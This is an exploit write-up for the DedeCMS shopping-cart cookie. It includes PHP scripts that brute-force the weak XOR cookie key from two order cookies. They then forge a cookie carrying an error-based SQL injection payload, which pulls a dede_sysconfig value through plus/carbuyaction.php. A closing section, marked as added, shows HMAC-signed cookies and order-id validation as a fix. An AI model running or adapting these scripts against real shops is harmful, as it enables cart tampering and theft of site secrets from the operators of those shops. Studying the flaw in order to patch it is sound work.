In include/shopcar.class.php, first look at how the shopcar class generates the cookie:

    function saveCookie($key, $value)
    {
        if (is_array($value))
        {
            $value = $this->enCrypt($this->enCode($value));
        }
        else
        {
            $value = $this->enCrypt($value);
        }
        setcookie($key, $value, time() + 36000, '/');
    }

Simply put, $key is the cookie name and $value is its value; enCode converts an array into a query string of the form a=yy&b=cc&d=... The key point is the enCrypt function:

    function enCrypt($txt)
    {
        srand((double)microtime() * 1000000);
        $encrypt_key = md5(rand(0, 32000));   // per-cookie key: only 32000 possibilities
        $ctr = 0;
        $tmp = '';
        for ($i = 0; $i < strlen($txt); $i++)
        {
            $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
            // each key byte is written into the output right before the byte it masks
            $tmp .= $encrypt_key[$ctr] . ($txt[$i] ^ $encrypt_key[$ctr++]);
        }
        return base64_encode($this->setKey($tmp));
    }

    function setKey($txt)
    {
        global $cfg_cookie_encode;
        $encrypt_key = md5(strtolower($cfg_cookie_encode));   // static site-wide key
        $ctr = 0;
        $tmp = '';
        for ($i = 0; $i < strlen($txt); $i++)
        {
            $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
            $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
        }
        return $tmp;
    }

The parameter $txt of enCrypt is known (it is the plaintext of the cart entry), and the return value is the cookie value, which is also known. The $tmp that enCrypt passes to setKey is, in a sense, known as well: because $encrypt_key = md5(rand(0, 32000)) has only 32000 possibilities, we can enumerate all 32000 candidate values of $tmp, and from each of them derive one candidate for md5(strtolower($cfg_cookie_encode)). To state the goal explicitly: we want to recover the value of $encrypt_key inside setKey, because once it is known, a shopping cart cookie can be constructed at will. Enumerating the 32000 candidates for md5(strtolower($cfg_cookie_encode)) is straightforward.
Since the real key is an md5 hex digest, discard every candidate that contains a non-alphanumeric byte; only a few hundred candidates survive. The cookie from a second order gives another few hundred candidates, and the intersection of the two sets yields the final key. The code is as follows:

    <?php
    $cookie1 = "Recipe="; // here is the first cookie, change here
    $cookie2 = "Recipe="; // here is the second cookie, change here
    $plantxt = "id=2&price=0&units=Fun&buynum=1&title=naduohua1"; // here is the plaintext, change here

    // XOR the first 32 bytes of the decoded cookie with the first 32 bytes of the
    // candidate $tmp: if the candidate is right, this is exactly the setKey() key.
    function reStrCode($code, $string)
    {
        $code = base64_decode($code);
        $key = "";
        for ($i = 0; $i < 32; $i++)
        {
            $key .= $string[$i] ^ $code[$i];
        }
        return $key;
    }

    // Try every possible per-cookie key and keep the candidates that look like a hex digest.
    function getKeys($cookie, $plantxt)
    {
        $results = array();
        for ($j = 0; $j < 32000; $j++)
        {
            $txt = $plantxt;
            $ctr = 0;
            $tmp = '';
            $encrypt_key = md5($j);
            for ($i = 0; $i < strlen($txt); $i++)
            {
                $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
                $tmp .= $encrypt_key[$ctr] . ($txt[$i] ^ $encrypt_key[$ctr++]);
            }
            $string = $tmp;
            $code = $cookie;
            $result = reStrCode($code, $string);
            if (preg_match('/^[a-z0-9]+$/i', $result))
            {
                echo $result . "\n";
                $results[] = $result;
            }
        }
        return $results;
    }

    $results1 = getKeys($cookie1, $plantxt);
    $results2 = getKeys($cookie2, $plantxt);
    print "\n-------------------- real key --------------------------\n";
    foreach ($results1 as $test1)
    {
        foreach ($results2 as $test2)
        {
            if ($test1 == $test2)
            {
                echo $test1 . "\n";
            }
        }
    }
    ?>

cookie1 and cookie2 are the cookies generated after I placed two orders.
plantxt can be worked out from the page; it has roughly the format id=2&price=0&units=fun&buynum=1&title=naduohua1. With the key recovered, we can construct a cookie for any shopping cart. Next, look at the MemberShops class:

    class MemberShops
    {
        var $OrdersId;
        var $productsId;

        function __construct()
        {
            $this->OrdersId = $this->getCookie("OrdersId");
            if (empty($this->OrdersId))
            {
                $this->OrdersId = $this->MakeOrders();
            }
        }
    }

OrdersId is taken directly from the cookie. Then in /plus/carbuyaction.php:

    $cart = new MemberShops();
    $OrdersId = $cart->OrdersId; // the order number of this record
    ......
    $rows = $dsql->GetOne("SELECT `id` FROM dede_shops_orders WHERE oid='$OrdersId' LIMIT 0,1");

So we can generate a cookie carrying the following injection:

    <?php
    $txt = "1' or 1=@'\'' and (SELECT 1 FROM (select count(*), concat(floor(rand(0)*2), (substring(select value from dede_sysconfig where aid=3), 1, 62) a from information_schema.tables group by a) B) or 1=@'\'' or '1'='1";
    $encrypt_key = "9f09293b7419ed68448fb51d5b174834"; // here is the key, please change here

    // same as shopcar.class.php setKey(), using the recovered key
    function setKey($txt)
    {
        global $encrypt_key;
        $ctr = 0;
        $tmp = '';
        for ($i = 0; $i < strlen($txt); $i++)
        {
            $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
            $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
        }
        return $tmp;
    }

    // same as shopcar.class.php enCrypt()
    function enCrypt($txt)
    {
        srand((double)microtime() * 1000000);
        $encrypt_key = md5(rand(0, 32000));
        $ctr = 0;
        $tmp = '';
        for ($i = 0; $i < strlen($txt); $i++)
        {
            $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
            $tmp .= $encrypt_key[$ctr] . ($txt[$i] ^ $encrypt_key[$ctr++]);
        }
        return base64_encode(setKey($tmp));
    }

    // regenerate until the base64 output contains no '+', which would not survive the cookie header
    for ($dest = 0; $dest = enCrypt($txt);)
    {
        if (!strpos($dest, '+'))
        {
            break;
        }
    }
    echo $dest . "\n";
    ?>
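For contrast with the XOR scheme above and the unvalidated OrdersId in carbuyaction.php, here is an added hardening example; it is not DedeCMS code and is not part of the original article. It assumes a long random server secret (placeholder below) in place of the short $cfg_cookie_encode, and that the application's own order ids are alphanumeric.

```php
<?php
// Added example, not DedeCMS code. Assumption: $secret is generated once with
// random_bytes() and stored in server config; the value here is a placeholder.
$secret = 'REPLACE_WITH_OUTPUT_OF_bin2hex(random_bytes(32))';

// The cart needs integrity, not secrecy: an HMAC-SHA256 tag replaces both XOR
// passes, so there is no per-cookie key to brute-force and no static key to recover.
function sealCart(array $cart, $secret)
{
    $payload = base64_encode(json_encode($cart));
    $tag = hash_hmac('sha256', $payload, $secret);
    return $payload . '.' . $tag;
}

// Verify the tag in constant time before trusting any field; null on any failure.
function openCart($cookie, $secret)
{
    $parts = explode('.', $cookie, 2);
    if (count($parts) !== 2) {
        return null;
    }
    list($payload, $tag) = $parts;
    $expected = hash_hmac('sha256', $payload, $secret);
    if (!hash_equals($expected, $tag)) {
        return null;
    }
    $cart = json_decode(base64_decode($payload, true), true);
    return is_array($cart) ? $cart : null;
}

// Even an authenticated cookie should not feed the oid query unchecked: accept only
// the shape the application itself generates (assumed alphanumeric, 1-32 chars).
function validOrdersId($id)
{
    return is_string($id) && preg_match('/^[A-Za-z0-9]{1,32}$/', $id) === 1;
}

// Constructed demo values; price is kept server-side in practice, never read from the cookie.
$cookie = sealCart(array('id' => 2, 'buynum' => 1, 'title' => 'naduohua1'), $secret);
var_dump(openCart($cookie, $secret) !== null);      // genuine cookie verifies
$first = $cookie[0] === 'A' ? 'B' : 'A';
$tampered = $first . substr($cookie, 1);             // one byte of payload changed
var_dump(openCart($tampered, $secret) === null);    // tag no longer matches
var_dump(validOrdersId("1' or '1'='1") === false); // injection-shaped id rejected
```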